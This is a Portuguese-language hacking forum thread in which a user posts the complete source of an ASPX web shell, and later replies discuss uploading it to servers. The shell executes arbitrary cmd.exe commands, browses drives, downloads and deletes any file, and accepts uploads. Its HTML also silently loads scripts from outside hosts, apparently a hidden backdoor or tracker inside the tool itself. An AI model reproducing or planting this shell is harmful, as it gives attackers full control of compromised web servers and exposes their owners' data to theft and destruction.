Shell para .Aspx

5ubzer0

Elite Hacker

Registrado em: Jul 2009
Posts: 512

Font Size

Dica Shell para .Aspx

28-02-2010, 12:19

Código:

<%-- ASPX Shell by LT <lt@mac.hush.com> (2007) --%>
<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<%
    string outstr = "";
   
    // get pwd
    string dir = Page.MapPath(".") + "/";
    if (Request.QueryString["fdir"] != null)
        dir = Request.QueryString["fdir"] + "/";
    dir = dir.Replace("\\", "/");
    dir = dir.Replace("//", "/");
   
    // build nav for path literal
    string[] dirparts = dir.Split('/');
    string linkwalk = "";   
    foreach (string curpart in dirparts)
    {
        if (curpart.Length == 0)
            continue;
        linkwalk += curpart + "/";
        outstr += string.Format("<a href='?fdir={0}'>{1}/</a>&nbsp;",
                                    HttpUtility.UrlEncode(linkwalk),
                                    HttpUtility.HtmlEncode(curpart));
    }
    lblPath.Text = outstr;
   
    // create drive list
    outstr = "";
    foreach(DriveInfo curdrive in DriveInfo.GetDrives())
    {
        if (!curdrive.IsReady)
            continue;
        string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
        outstr += string.Format("<a href='?fdir={0}'>{1}</a>&nbsp;",
                                    HttpUtility.UrlEncode(driveRoot),
                                    HttpUtility.HtmlEncode(driveRoot));
    }
    lblDrives.Text = outstr;

    // send file ?
    if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
    {
        Response.ClearContent();
        Response.WriteFile(Request.QueryString["get"]);
        Response.End();
    }

    // delete file ?
    if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
        File.Delete(Request.QueryString["del"]);   

    // receive files ?
    if(flUp.HasFile)
    {
        string fileName = flUp.FileName;
        int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
        if (splitAt >= 0)
            fileName = flUp.FileName.Substring(splitAt);
        flUp.SaveAs(dir + "/" + fileName);
    }

    // enum directory and generate listing in the right pane
    DirectoryInfo di = new DirectoryInfo(dir);
    outstr = "";
    foreach (DirectoryInfo curdir in di.GetDirectories())
    {
        string fstr = string.Format("<a href='?fdir={0}'>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curdir.Name),
                                    HttpUtility.HtmlEncode(curdir.Name));
        outstr += string.Format("<tr><td>{0}</td><td>&lt;DIR&gt;</td><td></td></tr>", fstr);
    }
    foreach (FileInfo curfile in di.GetFiles())
    {
        string fstr = string.Format("<a href='?get={0}' target='_blank'>{1}</a>",
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name),
                                    HttpUtility.HtmlEncode(curfile.Name));
        string astr = string.Format("<a href='?fdir={0}&del={1}'>Del</a>",
                                    HttpUtility.UrlEncode(dir),
                                    HttpUtility.UrlEncode(dir + "/" + curfile.Name));
        outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
    }
    lblDirOut.Text = outstr;

    // exec cmd ?
    if (txtCmdIn.Text.Length > 0)
    {
        Process p = new Process();
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.WorkingDirectory = dir;
        p.Start();

        lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
        txtCmdIn.Text = "";
    }   
%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>ASPX Shell</title>
    <style type="text/css">
        * { font-family: Arial; font-size: 12px; }
        body { margin: 0px; }
        pre { font-family: Courier New; background-color: #CCCCCC; }
        h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
        h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
        th { text-align: left; background-color: #99CC99; }
        td { background-color: #CCFFCC; }
        pre { margin: 2px; }
    </style>
</head>
<body>
    <h1>ASPX Shell by LT</h1>
    <form id="form1" runat="server">
     <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
    <SCRIPT SRC=http://www.n0t.org/yazciz/ciz.js></SCRIPT>
    <table style="width: 100%; border-width: 0px; padding: 5px;">
        <tr>
            <td style="width: 50%; vertical-align: top;">
                <h2>Shell</h2>               
                <asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
                <asp:Button runat="server" ID="cmdExec" Text="Execute" />
                <pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
            </td>
            <td style="width: 50%; vertical-align: top;">
                <h2>File Browser</h2>
                <p>
                    Drives:<br />
                    <asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
                </p>
                <p>
                    Working directory:<br />
                    <b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
                </p>
                <table style="width: 100%">
                    <tr>
                        <th>Name</th>
                        <th>Size KB</th>
                        <th style="width: 50px">Actions</th>
                    </tr>
                    <asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
                </table>
                <p>Upload to this directory:<br />
                <asp:FileUpload runat="server" ID="flUp" />
                <asp:Button runat="server" ID="cmdUpload" Text="Upload" />
                </p>
            </td>
        </tr>
    </table>

    </form>
</body>
</html>

-------------------------------------------------------------------------------------------

Tags: Nenhum(a)

JeanM

Membro

Registrado em: Jul 2009

Posts: 356
- Share
- Tweet
Font Size

#2

28-02-2010, 15:29

Nem tenho, Valeu por compartilhar.
Top
Comment
semajfast

Membro

Registrado em: Sep 2011

Posts: 2
- Share
- Tweet
Font Size

#3

08-04-2012, 20:18

bom pessoal, vcs poderiam me explicar como usar esse shell?
Top
Comment
cloud_strifee

Membro

Registrado em: Jun 2013

Posts: 4
- Share
- Tweet
Font Size

#4

22-08-2013, 07:40

agradecimento

valw por compartilhar
Top
Comment
~~krugerhacker22~~

~~BANIDO~~

Registrado em: Sep 2012

Posts: 22
- Share
- Tweet
Font Size

#5

22-08-2013, 09:31

vlw manim vo subir aqui . rsss tamo junto !!
Top
Comment
ProgramoComOsPes

Membro

Registrado em: Aug 2013

Posts: 30
- Share
- Tweet
Font Size

#6

23-08-2013, 17:30

Postado Originalmente por semajfast Ver Post

bom pessoal, vcs poderiam me explicar como usar esse shell?

Semifast,
Acredito que seja do mesmo jeito que se usam as Shells em PHP, basta fazer o upload do arquivo no servidor e ser feliz!

"Apesar de todas as dificuldades, sigo em frente..."
Acesse meu canal de video aulas! http://www.youtube.com/user/thediogo12
Top
Comment

Unconfigured Ad Widget

Anúncio

Dica Shell para .Aspx

Comment

Comment

Comment

Comment

Comment